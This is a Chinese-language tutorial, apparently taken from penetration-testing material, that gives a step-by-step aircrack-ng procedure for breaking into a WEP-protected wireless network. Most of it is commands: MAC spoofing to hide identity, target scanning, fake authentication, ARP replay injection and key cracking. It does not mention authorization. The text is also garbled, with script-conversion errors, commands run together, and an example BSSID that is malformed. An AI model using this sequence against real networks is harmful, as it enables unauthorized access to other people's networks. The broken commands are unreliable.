滲透測試之wep無線網絡破解

WEP 無線網絡破解

WEP（無線等效協議）於 1999 年誕生，而且是用於無線網絡的最古老的安全標準。在 2003

年，WEP 被 WPA 以及以後被 WPA2 取代。因爲可使用更加安全的協議，WEP 加密不多

使用了。接下來我會使用 AirCrack 套件來破解 WEP 密碼。AirCrack 套件（或 AirCrackNG）是 WEP 和 WPA 密碼破解程序，它會抓取無線網絡封包，分析它們，使用這些

數據來破解 WEP 密碼。

 

準備使用 AirCrack 來破解WEP 加密的網絡會話。

 

1. 打開終端窗口，併產生無線網絡接口的列表：

airmon-ng

 

2. 在 interface 列下，選擇你的接口之一。這裏，使用 wlan0 。若是你的接口不一樣， 例如 mon0 ，請將每一個提到 wlan0 的地方都換成它。

 

 

3. 下面，須要中止 wlan0 接口，並把它關閉，便於接下來修改 MAC 地址。 airmon-ng stop ifconfig wlan0 down

 

4. 下面，須要修改咱們接口的 MAC 地址。因爲機器的 MAC 地址會在任何網絡上標識 你的存在，修改機器的標識容許隱藏真正的 MAC 地址。這裏，用 00:11:22:33:44:55 。 macchanger --mac 00:11:22:33:44:55 wlan0

 

5. 如今須要重啓 airmon-ng 。 airmon-ng start wlan0

 

6. 下面，會使用 airodump 來定位附近的可用無線網絡。 airodump-ng wlan0

 

7. 這會出現可用無線網絡的列表。一旦你找到了你想要攻擊的網絡，按下 Ctrl + C 來中止 搜索。選中 BSSID 列中的 MAC 地址，右擊你的鼠標，而且選擇複製。同時，把網絡正在 發送哪一個頻道的信號記錄下載。你會在 Channel 列中找到這個信息。這裏，這個頻道 是 10 。

 

8. 如今運行 airodump ，而且將所選 BSSID 的信息複製到文件中。會使用下列選項： -c 容許選擇頻道。這裏選擇 10 。 -w 容許選擇文件名稱。這裏選擇 wirelessattack 。 -bssid 容許選擇咱們的 BSSID 。這裏，從剪貼板上粘貼 09:AC:90:AB:78 。 airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan09. 新的窗口會打開，並展現這個命令的輸出。保持這個窗口開着。

 

10. 打開另外一個終端窗口，爲了嘗試組合它們，運行 aireplay 。它擁有下列語 法： aireplay-ng -1 0 –a [BSSID] –h [our chosen MAC address] –e [ESSID] [Interface] 。 aireplay-ng -1 0 -a 09:AC:90:AB:78 –h 00:11:22:33:44:55 –e backtrack wlan0

 

11. 下面，發送一些流量給路由器，便於捕獲一些數據。再次使用 aireplay ，如下 列格式： aireplay-ng -3 –b [BSSID] – h [Our chosen MAC address] [Interface] 。 aireplay-ng -3 –b 09:AC:90:AB:78 –h 00:11:22:33:44:55 wlan0

 

12. 你的屏幕會開始被流量填滿。將它運行一到兩分鐘，直到你擁有了用來執行破解的信 息。

 

13. 最後運行 AirCrack 來破解 WEP 密碼。 aircrack-ng –b 09:AC:90:AB:78 wirelessattack.cap 這就結束了。

 

          我使用了 AirCrack 套件來破解無線網絡的 WEP 密碼。AirCrack 是最流行 的 WEP 破解工具之一。AirCrack 經過收集 WEP 無線鏈接的封包來工做，以後它會經過算術 分析數據來破解 WEP 加密密碼。經過啓動 AirCrack 並選擇咱們想要的接口來開始。下 面，、修改了 MAC 地址，這容許修改互聯網上的身份，以後使用 airodump 搜索可用 的無線網絡來攻擊。一旦找到了打算攻擊的網絡，使用 aireplay 來將咱們的機器與 正在攻擊的無線設備的 MAC 地址關聯。最後收集到了一些流量，以後暴力破解生成的 CAP 文件來得到無線密碼。